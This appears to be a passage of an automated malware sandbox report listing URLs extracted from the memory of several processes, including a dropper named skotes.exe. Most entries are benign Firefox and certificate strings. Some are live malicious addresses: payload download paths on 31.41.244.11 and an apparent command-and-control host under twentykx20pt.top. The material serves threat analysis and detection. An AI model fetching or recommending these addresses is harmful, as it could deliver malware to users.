Source: skotes.exe, 00000006.00000002.2957851747.0000000000E9B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/6802601040/SxQyhJr.exeshqos.dll
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique1/random.exe
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exe
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exe1
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exe1aa;
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exe6%
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exe60N
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exe60ac02b4ded8abeee1fbdemp
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exe7d
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exe7d1
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exed
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exeedQ
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exej
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 0000001C.00000002.3012755816.000001DEEACC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2890160247.000001DEF9D44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB938000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/
Source: firefox.exe, 0000001C.00000002.2978589406.000001DEDEBD8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB96A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB938000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB938000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2875741877.000001DEFABD9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA38A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/dates-and-times
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA38A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/regular-expressionsp
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA38A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 0000001C.00000002.2978589406.000001DEDEB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/strings
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://home.twentykx20pt.top/bugEWhhZIPIipxajeFf736
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp String found in binary or memory: http://home.twentykx20pt.top/bugEWhhZIPIipxajeFfO1732855736
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp String found in binary or memory: http://home.twentykx20pt.top/bugEWhhZIPIipxajeFfO1732855736http://home.twentykx20pt.top/bugEWhhZIPIi
Source: firefox.exe, 0000001C.00000003.2822675345.000001DEF908F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/additionalProperties
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsFeatureGate
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsShowLessFrequentlyCap
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsUITreatment
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryMinCharsThreshold
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryUseCountThreshold
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bestMatchBlockingEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bestMatchEnabledhttp://mozilla.org/#/properties/mdnFeatureGate
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/experimentType
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/exposureResults
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isBestMatchExperiment
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoClientVariants
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoEndpointURL
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoProviders
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoTimeoutMs
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/originsAlternativeEnable
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/originsDaysCutOff
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesAlternativeEnable
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesHalfLifeDays
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesHighWeight
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesLowWeight
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesMediumWeight
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pagesNumSampledVisits
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pocketFeatureGate
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pocketShowLessFrequentlyCap
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestAllowPositionInSuggestions
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestBlockingEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestDataCollectionEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestImpressionCapsSponsoredEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestNonSponsoredIndex
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScenario
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestScoreMap
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/quickSuggestSponsoredEnabled
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showExposureResults
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/weatherKeywords
Source: firefox.exe, 0000001C.00000003.2754238638.000001DEF705F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2910065957.000001DEF1F3B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2728904832.000001DEEEC71000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2758502866.000001DEF6A31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2786698706.000001DEEF9FE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2828014808.000001DEF6A28000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2812300663.000001DEF05CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2729546937.000001DEEEC71000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755426525.000001DEF6930000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3047167053.000001DEEC13C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2910065957.000001DEF1F25000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2839862901.000001DEEC962000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756065289.000001DEF6A89000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2756197782.000001DEF6AB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2847420090.000001DEF6AAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2833254348.000001DEF0316000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2896162189.000001DEF6989000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2920506033.000001DEF124C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2786698706.000001DEEF9D7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755005207.000001DEF702A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3057071342.000001DEEC977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: firefox.exe, 0000001C.00000002.3003513879.000001DEEA97D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
Source: firefox.exe, 0000001C.00000003.2894687735.000001DEF7046000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0.
Source: firefox.exe, 0000001C.00000003.2910065957.000001DEF1F31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB946000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.i.lencr.org/0W
Source: firefox.exe, 0000001C.00000003.2910065957.000001DEF1F31000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB946000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2894687735.000001DEF7046000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://r3.o.lencr.org0
Source: SxQyhJr.exe, 00000007.00000002.2431381161.0000000003059000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: firefox.exe, 0000001C.00000002.3003513879.000001DEEA97D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: firefox.exe, 0000001C.00000002.3003513879.000001DEEA97D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%s
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEADAA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3019407940.000001DEEADA6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2923386485.000001DEF11EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
Source: firefox.exe, 0000001C.00000003.2923613146.000001DEF11C8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulJ
Source: firefox.exe, 0000001C.00000003.2923386485.000001DEF11EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulP
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD3A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulbrowser.sessionstore.upgradeBackup.maxU
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://extensions/content/parent/ext-
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulchrome://passwordmgr/locale/passwordmgr
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulcreateNotificationMessageElement/setAle
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADAA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulopenPreferences/internalPrefCategoryNam
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24F5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2719907749.000001DEEE700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2933815847.000001DEF0379000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720959869.000001DEEC184000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720400561.000001DEEC141000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2720790655.000001DEEC163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/
Source: firefox.exe, 0000001C.00000003.2903058147.000001DEF24F5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/?t=ffab&q=
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: a6f0d09f38.exe, 0000000D.00000003.2573722627.0000000005BCC000.00000004.00000800.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2573822622.0000000005BCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 0000001C.00000002.3010463460.000001DEEAA10000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000003.2755426525.000001DEF693A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/y
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2721477258.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2839862901.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2721477258.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2839862901.000001DEEC933000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 0000001F.00000002.2955222099.000001D14E812000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E713000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 0000001C.00000003.2760314917.000001DEEFF91000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2761194812.000001DEEFF92000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-settings-attachments.cdn.mozilla.net/main-workspace/ms-images/706c7a85-cf23-442e-8a9
Source: firefox.exe, 0000001C.00000002.3001889231.000001DEEA7C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD3A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9DEB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firefox.settings.services.mozilla.com/v1BrowserInitState.startupIdleTaskPromise
